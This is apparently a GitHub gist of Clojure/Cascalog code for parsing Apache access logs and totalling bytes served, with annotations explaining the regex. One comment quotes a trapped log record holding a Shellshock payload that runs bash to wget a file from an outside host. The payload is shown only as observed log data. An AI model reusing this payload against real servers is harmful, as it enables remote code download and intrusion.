@jdevoo
Created March 21, 2015 16:25
Apache Logs
(ns spatialog.core
  (:use [cascalog api])
  (:require [cascalog.cascading.tap :as tap]
            [cascalog.logic.ops :as c]))  ; c/sum is used in the REPL query below

;; Split one Apache combined-format log line into its nine fields.
;; The parameter is named `line` so it does not shadow clojure.core/str.
(defn parse-log-str [line]
  (rest (re-find #"^(\S+) (\S+) (\S+) \[([\w:/]+\s[+\-]\d{4})\] \"(.+?)\" (\S+) (\S+) \"([^\"]*)\" \"([^\"]*)\"" line)))

;; Query over every gzipped access log under resources/ that matches the glob.
(def apache-logs-tap
  (let [src (tap/hfs-textline "resources/"
                              :compression :enable
                              :source-pattern "Site?-access.log.gz")
        log-fields ["?remote-addr" "?remote-logname" "?user" "?time"
                    "?request" "?status" "?bytes_string"
                    "?referrer" "?browser"]]
    (<- log-fields
        (src ?line)
        (parse-log-str ?line :>> log-fields)
        ;; lines that fail to parse are written to resources/err
        (:trap (tap/hfs-textline "resources/err"))
        (:distinct false))))

;;;; from the REPL
;(?<- (stdout)
;     [?total_bytes]
;     (apache-logs-tap _ _ _ _ _ _ ?bytes_string _ _)
;     (read-string ?bytes_string :> ?bytes_int)
;     (c/sum ?bytes_int :> ?total_bytes))
; RESULTS
; -----------------------
; 9298259965
; -----------------------
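
The regex can be checked at a plain Clojure REPL without Cascalog or Hadoop. The sketch below repeats the gist's pattern and runs it on a made-up log line; `sample-line` and its values are assumptions for illustration and do not come from the real logs.

```clojure
;; Same pattern as in the gist, repeated here so the snippet stands alone.
(defn parse-log-str [line]
  (rest (re-find #"^(\S+) (\S+) (\S+) \[([\w:/]+\s[+\-]\d{4})\] \"(.+?)\" (\S+) (\S+) \"([^\"]*)\" \"([^\"]*)\"" line)))

;; Hypothetical sample line in Apache combined log format.
(def sample-line
  "192.0.2.1 - - [02/Mar/2015:00:42:11 +0200] \"GET /index.html HTTP/1.1\" 200 1234 \"-\" \"Mozilla/5.0\"")

(def fields (parse-log-str sample-line))

(count fields)   ; => 9, one value per entry in log-fields
(nth fields 6)   ; => "1234", the seventh field, bound to ?bytes_string in the query
```

The seventh position is why the REPL query puts `?bytes_string` after six `_` placeholders.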

jdevoo commented Mar 23, 2015

The same script run on my Windows 7 + Cygwin machine with Java 1.6 yields 23564569884 bytes and one trapped record:
91.121.163.193 - - [02/Mar/2015:00:42:11 +0200] "GET / HTTP/1.0" 200 19952 "() { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3139342e3130322e3233312e38\"" "() { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3139342e3130322e3233312e38\""
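
A likely reason this record lands in the trap, offered as a guess since the comment does not say: the referrer and user-agent fields contain an embedded unescaped double quote, so the `\"([^\"]*)\"` groups cannot match and `re-find` returns nil. The sketch below uses a shortened, hypothetical line with the same quoting shape (`shellshock-like-line` is not the real record).

```clojure
;; Same pattern as in the gist, repeated here so the snippet stands alone.
(defn parse-log-str [line]
  (rest (re-find #"^(\S+) (\S+) (\S+) \[([\w:/]+\s[+\-]\d{4})\] \"(.+?)\" (\S+) (\S+) \"([^\"]*)\" \"([^\"]*)\"" line)))

;; Hypothetical, shortened line: the last two quoted fields each contain
;; an unescaped inner quote followed by an escaped one, as in the trapped record.
(def shellshock-like-line
  (str "192.0.2.1 - - [02/Mar/2015:00:42:11 +0200] \"GET / HTTP/1.0\" 200 19952 "
       "\"() { :;}; /bin/bash -c \"wget x\\\"\" "
       "\"() { :;}; /bin/bash -c \"wget x\\\"\""))

;; No match, so (rest nil) gives an empty seq instead of nine fields.
(def parsed (parse-log-str shellshock-like-line))

(empty? parsed)   ; => true
```

An empty result cannot be bound to the nine variables in `log-fields`, which would explain why the tuple is diverted to `resources/err` rather than counted.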